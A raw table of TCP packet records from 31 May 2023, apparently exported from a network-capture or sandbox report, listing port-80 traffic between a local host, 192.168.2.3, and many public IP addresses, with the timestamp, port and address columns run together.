                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813122988 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813122988 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813143015 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813169003 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813189983 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813189983 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813194990 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813261986 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.813261986 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.818423986 CEST804997070.39.251.249192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.818555117 CEST4997080192.168.2.370.39.251.249
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.837877989 CEST4997880192.168.2.364.125.133.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.902307034 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.912441015 CEST804996859.106.19.204192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.912483931 CEST804996859.106.19.204192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.912610054 CEST4996880192.168.2.359.106.19.204
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.927076101 CEST4994580192.168.2.3210.140.73.39
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.950576067 CEST80499773.94.41.167192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.950731993 CEST4997780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.020590067 CEST4997780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.051323891 CEST8049979104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.051455021 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.051861048 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.083998919 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084039927 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084059000 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084079027 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084115982 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084132910 CEST8049972118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084259033 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.084259033 CEST4997280192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.088474989 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.166507959 CEST80499773.94.41.167192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.166557074 CEST80499773.94.41.167192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.166701078 CEST4997780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.200730085 CEST8049979104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.201287031 CEST8049979104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.203624010 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.216479063 CEST804998066.94.119.160192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.216658115 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.227030039 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.231201887 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.238200903 CEST4997780192.168.2.33.94.41.167
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.265547037 CEST4971280192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.265655994 CEST4971680192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.265705109 CEST4982280192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.297806025 CEST8049822213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.299477100 CEST804971262.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.311268091 CEST4970780192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.325870037 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.325901031 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.325957060 CEST4998380192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.327972889 CEST4998480192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.328048944 CEST8049707188.114.96.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.328130960 CEST4970780192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.344557047 CEST8049984188.114.96.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.346026897 CEST4998480192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.352108955 CEST4998480192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.355004072 CEST804998066.94.119.160192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.355758905 CEST804998066.94.119.160192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.355828047 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.358304024 CEST8049983213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.358414888 CEST4998380192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.359860897 CEST804998162.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.360210896 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.368737936 CEST8049984188.114.96.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.368993998 CEST4998380192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.369029045 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.379862070 CEST8049984188.114.96.7192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.380033970 CEST4998480192.168.2.3188.114.96.7
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.380214930 CEST8049979104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.381072044 CEST8049979104.196.26.65192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.381500959 CEST4997980192.168.2.3104.196.26.65
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.383992910 CEST80499773.94.41.167192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.396692991 CEST4971480192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402704954 CEST8049983213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402735949 CEST8049983213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402754068 CEST8049983213.186.33.17192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402770996 CEST804998162.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402811050 CEST4998380192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.402868032 CEST4998380192.168.2.3213.186.33.17
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.404834032 CEST804998162.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.405045033 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.413278103 CEST8049714104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.413439989 CEST4971480192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.439047098 CEST4971380192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.454751015 CEST8049713216.58.215.243192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.455018997 CEST4971380192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.473917007 CEST8049716170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.535149097 CEST8049982170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.535824060 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.620965958 CEST4998580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.632926941 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.636120081 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.637644053 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.637773037 CEST4998580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.642723083 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.646414042 CEST4998680192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.661966085 CEST8049986216.58.215.243192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.662127018 CEST4998680192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.668447018 CEST804998162.122.190.121192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.671696901 CEST4998180192.168.2.362.122.190.121
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.679572105 CEST4998580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.696140051 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707050085 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707092047 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707109928 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707129955 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707146883 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707163095 CEST8049985104.26.15.53192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707305908 CEST4998580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.707364082 CEST4998580192.168.2.3104.26.15.53
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.712945938 CEST4998680192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.715763092 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.723582029 CEST4972280192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.728403091 CEST8049986216.58.215.243192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.735621929 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.735852957 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.736289978 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.740381956 CEST8049722104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.740524054 CEST4972280192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.756088972 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.756448030 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.756537914 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.758599043 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.771632910 CEST804998066.94.119.160192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.771869898 CEST4998080192.168.2.366.94.119.160
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.778920889 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.779124975 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.824407101 CEST4998880192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.824508905 CEST4998980192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.841016054 CEST8049988104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.843871117 CEST4998880192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.845201969 CEST8049982170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.860173941 CEST4998880192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.876995087 CEST8049988104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.891819000 CEST8049986216.58.215.243192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.893584967 CEST4998680192.168.2.3216.58.215.243
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.940310001 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.962902069 CEST8049988104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.962932110 CEST8049988104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.962948084 CEST8049988104.21.88.198192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.962976933 CEST4998880192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.963044882 CEST4998880192.168.2.3104.21.88.198
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.964215994 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.965954065 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.969404936 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.973356962 CEST804998954.161.222.85192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.973478079 CEST4998980192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.989779949 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.991837978 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.998415947 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.014199972 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.018840075 CEST80499873.65.101.129192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.018963099 CEST4998780192.168.2.33.65.101.129
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.034395933 CEST4998980192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.041085958 CEST4999180192.168.2.3206.191.152.37
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.085550070 CEST4982480192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.101270914 CEST4971780192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.102754116 CEST4999280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.113100052 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.126082897 CEST804971780.74.154.6192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.126168013 CEST4971780192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.138423920 CEST804999380.74.154.6192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.138851881 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.141320944 CEST4971980192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.142872095 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.143408060 CEST4999480192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.147973061 CEST8049982170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.148068905 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.148161888 CEST8049982170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.150274992 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.164872885 CEST804971934.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.164953947 CEST4971980192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.166695118 CEST804999434.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.167783022 CEST4999480192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.167980909 CEST804999380.74.154.6192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.168029070 CEST804999380.74.154.6192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.175079107 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.179152966 CEST804998954.161.222.85192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.179192066 CEST804998954.161.222.85192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.179311037 CEST4998980192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.187439919 CEST8049824192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.190613985 CEST4982480192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.200601101 CEST8049992192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.202155113 CEST4999280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.208430052 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.210352898 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.220293045 CEST4998980192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.220614910 CEST4972680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.233035088 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.267767906 CEST804972689.161.163.246192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.269562960 CEST4972680192.168.2.389.161.163.246
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.292927980 CEST4971880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.292979956 CEST4999480192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.293052912 CEST4999280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.295329094 CEST4999580192.168.2.389.161.163.246
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.295716047 CEST4999680192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.295821905 CEST4999780192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.297024012 CEST4998280192.168.2.3170.82.174.30
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.297951937 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.299118042 CEST4973180192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.303327084 CEST4999880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.303972960 CEST8049991206.191.152.37192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.304106951 CEST4999180192.168.2.3206.191.152.37
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.305644035 CEST4999180192.168.2.3206.191.152.37
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.314347029 CEST80497183.64.163.50192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.314434052 CEST4971880192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.317441940 CEST80499973.64.163.50192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.317585945 CEST4999780192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.317678928 CEST804999434.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.319478035 CEST4999780192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.323226929 CEST804999380.74.154.6192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.323299885 CEST4999380192.168.2.380.74.154.6
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.327764034 CEST804999589.161.163.246192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.327877998 CEST4999580192.168.2.389.161.163.246
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.328902006 CEST804999434.117.168.233192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.329000950 CEST4999480192.168.2.334.117.168.233
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.341100931 CEST80499973.64.163.50192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.341180086 CEST80499973.64.163.50192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.341339111 CEST4999780192.168.2.33.64.163.50
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.366743088 CEST804998954.161.222.85192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.392097950 CEST8049992192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.392138958 CEST8049992192.241.158.94192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.392280102 CEST4999280192.168.2.3192.241.158.94
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.397397041 CEST8049731192.252.154.18192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.397542953 CEST4973180192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.401690006 CEST8049998192.252.154.18192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.401797056 CEST4999880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.428499937 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429625988 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429657936 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429677010 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429697037 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429716110 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429717064 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429734945 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429755926 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429769039 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429774046 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429789066 CEST8049990122.128.109.107192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429792881 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429821014 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.429842949 CEST4999080192.168.2.3122.128.109.107
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.442264080 CEST804999654.161.222.85192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.442400932 CEST4999680192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.445672035 CEST4999580192.168.2.389.161.163.246
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.467647076 CEST4999980192.168.2.3172.67.72.98
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.476418972 CEST804999589.161.163.246192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.484332085 CEST8049999172.67.72.98192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.484569073 CEST4999980192.168.2.3172.67.72.98
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.507071018 CEST8049982170.82.174.30192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.525486946 CEST8049957173.254.28.29192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.525618076 CEST4995780192.168.2.3173.254.28.29
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.568526983 CEST8049991206.191.152.37192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.568624020 CEST8049991206.191.152.37192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.568639994 CEST8049991206.191.152.37192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.568659067 CEST8049991206.191.152.37192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.568749905 CEST4999180192.168.2.3206.191.152.37
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.620608091 CEST4999980192.168.2.3172.67.72.98
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.623318911 CEST4999180192.168.2.3206.191.152.37
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.623383045 CEST4999880192.168.2.3192.252.154.18
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.637288094 CEST8049999172.67.72.98192.168.2.3
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.642215014 CEST4999680192.168.2.354.161.222.85
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.648745060 CEST8049982170.82.174.30192.168.2.3
